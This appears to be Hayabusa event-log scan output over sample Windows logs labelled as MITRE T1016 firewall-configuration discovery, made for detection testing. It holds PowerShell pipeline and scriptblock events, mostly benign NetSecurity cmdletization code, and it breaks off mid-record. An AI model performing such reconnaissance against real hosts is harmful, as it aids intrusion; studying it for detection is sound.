Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter 
= Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } e,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 
